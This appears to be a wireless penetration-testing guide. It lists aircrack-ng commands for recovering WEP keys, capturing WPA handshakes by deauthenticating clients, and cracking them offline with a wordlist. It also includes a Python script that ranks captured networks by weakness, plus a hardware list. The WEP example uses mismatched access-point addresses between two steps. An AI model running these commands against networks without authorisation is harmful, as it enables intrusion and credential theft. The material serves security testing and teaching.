Wireless pentest
Open network
Usually used for guest access and restricted to internet access only.
Guests either join directly or have to authenticate through a captive portal.
WEP
This protocol has been completely broken for many years and should not be used anymore.
The key can be recovered very easily:
# Capture around 30,000 IVs (maybe more); -w out writes the capture to out-01.cap
airodump-ng -c 11 --bssid 60:A4:4C:20:DF:60 -w out wlan0mon
# Generate ARP traffic (ARP request replay: -b is the AP BSSID, -h the MAC of an associated client)
aireplay-ng -3 -b 00:09:58:6F:64:1E -h 44:60:57:C8:58:A0 wlan0mon
# Monitor the number of IVs with
aircrack-ng out-01.cap
# Break the key
aircrack-ng out-01.cap
WPA
Two authentication modes:
Personal = WPA PSK (Pre-Shared Key) = authentication by a secret shared with everyone (like at home)
Enterprise = WPA MGT (Management) = EAP (Extensible Authentication Protocol). Several different EAP methods can be used (see the official list on the IANA website), but these are the most common ones:
PEAP: historically the only method supported by Windows; it transmits the AD credentials via MSCHAPv2, which allows a NetNTLMv2 hash to be recovered through the Evil-Twin attack.
EAP-TTLS: very similar; authentication can be by login/password, which can be recovered via the Evil-Twin attack if the clients do not check the certificate of the access point.
EAP-TLS : mutual authentication by certificate.
The Hacking process
# check if the wireless card is detected
iwconfig
# shut card if necessary
ifconfig wlan0 down
# kill all interference
airmon-ng check kill
# put the card in monitor mode
iwconfig wlan0 mode monitor
# relaunch it
ifconfig wlan0 up
OR
# check if the wireless card is detected
iwconfig
# kill all interference
airmon-ng check kill
# put card in monitor mode
airmon-ng start wlan0
# check if it worked
iwconfig
# Find the SSIDs in scope for the test
airodump-ng wlan0mon
# Monitor the target for handshakes: -c is the channel number and --bssid the AP MAC address, both found with the previous command
airodump-ng -c <channel-number> --bssid <MAC-ADDRESS> -w capture wlan0mon
# Send a deauthentication frame (-a is the AP, -c the station) to force a reconnection and capture the handshake
aireplay-ng -0 1 -a <MAC-ADDRESS> -c <MAC-ADDRESS-STATION> wlan0mon
# Check the .cap capture file that holds the handshake to crack
ls capture*
# Crack the handshake with a wordlist
aircrack-ng -w wordlist -b <MAC-ADDRESS> capture-NN.cap
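As an added example (not from the original page), a small Python triage of the CSV that airodump-ng writes next to the .cap file when run with -w: it maps each network onto the categories above (open, WEP, WPA PSK, WPA MGT) and attaches the risk note a report would carry. The column names are those of airodump-ng's CSV export; the sample capture, BSSIDs and ESSIDs are constructed.

```python
import csv
import io
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:01, 2024-01-01 10:00:00, 2024-01-01 10:05:00, 11, 54, WEP, WEP, , -60, 120, 31245, 0. 0. 0. 0, 9, legacy-ap, 
00:11:22:33:44:02, 2024-01-01 10:00:00, 2024-01-01 10:05:00, 6, 130, WPA2, CCMP, PSK, -55, 300, 0, 0. 0. 0. 0, 8, home-net, 
00:11:22:33:44:03, 2024-01-01 10:00:00, 2024-01-01 10:05:00, 1, 130, WPA2, CCMP, MGT, -70, 250, 0, 0. 0. 0. 0, 9, corp-wifi, 
00:11:22:33:44:04, 2024-01-01 10:00:00, 2024-01-01 10:05:00, 1, 54, OPN, , , -65, 90, 0, 0. 0. 0. 0, 5, guest, 

"""  # Constructed sample in the layout airodump-ng writes to <prefix>-NN.csv; every value is invented.

RISK = {  # per-category note in the page's terms (PSK = Personal, MGT = Enterprise/EAP); weakest first
    "open": "no encryption: anyone in range reads guest traffic; keep it internet-only",
    "wep": "WEP is broken: the key is recoverable from captured IVs; retire the AP",
    "wpa-psk": "shared passphrase: a captured handshake is guessable offline; use a long passphrase or WPA3",
    "wpa-enterprise": "EAP: clients must validate the server certificate or PEAP/EAP-TTLS credentials leak to an Evil-Twin",
    "unknown": "unrecognised mode; inspect manually",
}

def parse_access_points(text):
    # The AP table runs from the 'BSSID' header to the blank line before the 'Station MAC' table.
    rows, header = [], None
    for fields in csv.reader(io.StringIO(text), skipinitialspace=True):
        if not fields:                      # blank line: skip leading ones, stop after the AP table
            if header:
                break
            continue
        if header is None:
            header = [f.strip() for f in fields]
        else:
            rows.append(dict(zip(header, (f.strip() for f in fields))))
    return rows

def classify(ap):
    # Privacy is OPN/WEP/WPA/WPA2...; Authentication is PSK or MGT for WPA networks.
    if ap["Privacy"] == "OPN":
        return "open"
    if "WEP" in ap["Privacy"]:
        return "wep"
    return {"MGT": "wpa-enterprise", "PSK": "wpa-psk"}.get(ap["Authentication"], "unknown")

def triage(text):
    # Return (essid, bssid, category, note) tuples sorted weakest network first.
    findings = []
    for ap in parse_access_points(text):
        cat = classify(ap)
        note = RISK[cat]
        if cat == "wep" and int(ap["# IV"] or 0) >= 30000:   # the IV count the page says suffices
            note += f" ({ap['# IV']} IVs already seen in this capture)"
        findings.append((ap["ESSID"], ap["BSSID"], cat, note))
    return sorted(findings, key=lambda f: list(RISK).index(f[2]))
```

Run `triage(open("capture-01.csv").read())` against a real export to get the same weakest-first list for a report.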
Tools
Equipment
The following equipment can be used for Wi-Fi pentesting:
Wireless card Alfa AWUS036NH
Alfa AWUS1900
Alfa AWUS036ACH
Alfa AWUS052NH
Alfa AWUS051NH
Alfa AWUS036NHR
TP-Link TL-WN722N
Hak5 Pineapple Nano Basic
Flipper Zero with the Wi-Fi dev board
Resources